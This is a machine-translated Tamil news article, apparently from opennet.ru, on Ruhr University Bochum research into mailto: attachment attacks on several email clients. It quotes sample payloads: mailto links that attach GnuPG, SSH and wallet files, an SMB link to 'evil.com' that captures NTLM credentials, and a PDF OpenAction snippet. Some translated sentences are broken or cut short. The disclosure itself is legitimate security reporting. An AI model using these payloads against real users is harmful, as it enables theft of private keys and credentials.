ரூர் பல்கலைக்கழகம் போச்சும் (ஜெர்மனி) ஆராய்ச்சியாளர்கள்
இணைப்புகள் «
அஞ்சல் கிளையண்டுகளான Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL குறிப்புகள் (CVE-2020-4089) மற்றும் Pegasus Mail ஆகியவை உங்களைத் தானாக இணைக்கும் அற்பமான தாக்குதலுக்கு ஆளாகின்றன. "mailto:?attach=path_to_file" போன்ற இணைப்பு மூலம் குறிப்பிடப்பட்ட எந்த உள்ளூர் கோப்பு. ஒரு எச்சரிக்கையைக் காட்டாமல் கோப்பு இணைக்கப்பட்டுள்ளது, எனவே சிறப்பு கவனம் இல்லாமல், கடிதம் இணைப்புடன் அனுப்பப்படும் என்பதை பயனர் கவனிக்காமல் இருக்கலாம்.
எடுத்துக்காட்டாக, "mailto: போன்ற இணைப்பைப் பயன்படுத்துதல்:[மின்னஞ்சல் பாதுகாக்கப்பட்டது]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" நீங்கள் GnuPG இலிருந்து தனிப்பட்ட விசைகளை கடிதத்தில் செருகலாம். கிரிப்டோ வாலட்கள் (~/.bitcoin/wallet.dat), SSH விசைகள் (~/.ssh/id_rsa) மற்றும் பயனருக்கு அணுகக்கூடிய கோப்புகளின் உள்ளடக்கங்களையும் நீங்கள் அனுப்பலாம். மேலும், “attach=/tmp/*.txt” போன்ற கட்டமைப்பைப் பயன்படுத்தி முகமூடி மூலம் கோப்புகளின் குழுக்களை இணைக்க தண்டர்பேர்ட் உங்களை அனுமதிக்கிறது.
உள்ளூர் கோப்புகளுக்கு கூடுதலாக, சில மின்னஞ்சல் கிளையன்ட்கள் பிணைய சேமிப்பகத்திற்கான இணைப்புகள் மற்றும் IMAP சேவையகத்தில் உள்ள பாதைகளை செயலாக்குகின்றன. குறிப்பாக, "attach=\\evil.com\dummyfile" போன்ற இணைப்புகளைச் செயலாக்கும் போது பிணைய கோப்பகத்திலிருந்து ஒரு கோப்பை மாற்ற IBM குறிப்புகள் உங்களை அனுமதிக்கிறது, அத்துடன் தாக்குபவர் கட்டுப்படுத்தும் SMB சேவையகத்திற்கு இணைப்பை அனுப்புவதன் மூலம் NTLM அங்கீகார அளவுருக்களைத் தடுக்கிறது. (தற்போதைய அங்கீகார அளவுருக்கள் பயனருக்கு கோரிக்கை அனுப்பப்படும்).
“attach=imap:///fetch>UID>/INBOX>1/” போன்ற கோரிக்கைகளை Thunderbird வெற்றிகரமாக செயலாக்குகிறது, இது IMAP சர்வரில் உள்ள கோப்புறைகளிலிருந்து உள்ளடக்கத்தை இணைக்க உங்களை அனுமதிக்கிறது. அதே நேரத்தில், IMAP இலிருந்து பெறப்பட்ட செய்திகள், OpenPGP மற்றும் S/MIME வழியாக குறியாக்கம் செய்யப்பட்டு, அனுப்பும் முன் அஞ்சல் கிளையண்டால் தானாகவே மறைகுறியாக்கப்படும். தண்டர்பேர்டின் டெவலப்பர்கள்
தண்டர்பேர்டின் பழைய பதிப்புகள், ஆராய்ச்சியாளர்களால் முன்மொழியப்பட்ட PGP மற்றும் S/MIME ஆகியவற்றில் மற்ற இரண்டு தாக்குதல் வகைகளால் பாதிக்கப்படக்கூடியதாக இருந்தது. குறிப்பாக, Thunderbird, அத்துடன் OutLook, PostBox, eM Client, MailMate மற்றும் R2Mail2 ஆகியவை முக்கிய மாற்றுத் தாக்குதலுக்கு உட்பட்டன, அஞ்சல் கிளையன்ட் தானாகவே S/MIME செய்திகளில் அனுப்பப்படும் புதிய சான்றிதழ்களை இறக்குமதி செய்து நிறுவுகிறது. பயனரால் ஏற்கனவே சேமித்து வைக்கப்பட்டுள்ள பொது விசைகளை மாற்றியமைக்க தாக்குதல் நடத்துபவர்.
தண்டர்பேர்ட், போஸ்ட்பாக்ஸ் மற்றும் மெயில்மேட் ஆகியவை பாதிக்கப்படக்கூடிய இரண்டாவது தாக்குதல், வரைவுச் செய்திகளைத் தானாகச் சேமிப்பதற்கான பொறிமுறையின் அம்சங்களைக் கையாளுகிறது மற்றும் மெயில்டோ அளவுருக்களைப் பயன்படுத்தி, மறைகுறியாக்கப்பட்ட செய்திகளின் மறைகுறியாக்கத்தைத் தொடங்க அல்லது தன்னிச்சையான செய்திகளுக்கு டிஜிட்டல் கையொப்பத்தைச் சேர்க்க அனுமதிக்கிறது. தாக்குதலாளியின் IMAP சேவையகத்திற்கு முடிவை அனுப்புதல். இந்தத் தாக்குதலில், மறைக்குறியீடு "உடல்" அளவுரு மூலம் அனுப்பப்படுகிறது, மேலும் தாக்குபவர்களின் IMAP சேவையகத்திற்கு அழைப்பைத் தொடங்க "மெட்டா புதுப்பிப்பு" குறிச்சொல் பயன்படுத்தப்படுகிறது. உதாரணத்திற்கு: ' '
பயனர் தொடர்பு இல்லாமல் "mailto:" இணைப்புகளைத் தானாகச் செயல்படுத்த, சிறப்பாக வடிவமைக்கப்பட்ட PDF ஆவணங்களைப் பயன்படுத்தலாம் - PDF இல் உள்ள OpenAction செயல், ஆவணத்தைத் திறக்கும் போது தானாகவே mailto கையாளுதலைத் தொடங்க உங்களை அனுமதிக்கிறது:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——தொடங்கு PGP MESSAGE—[…])>>
endobj
ஆதாரம்: opennet.ru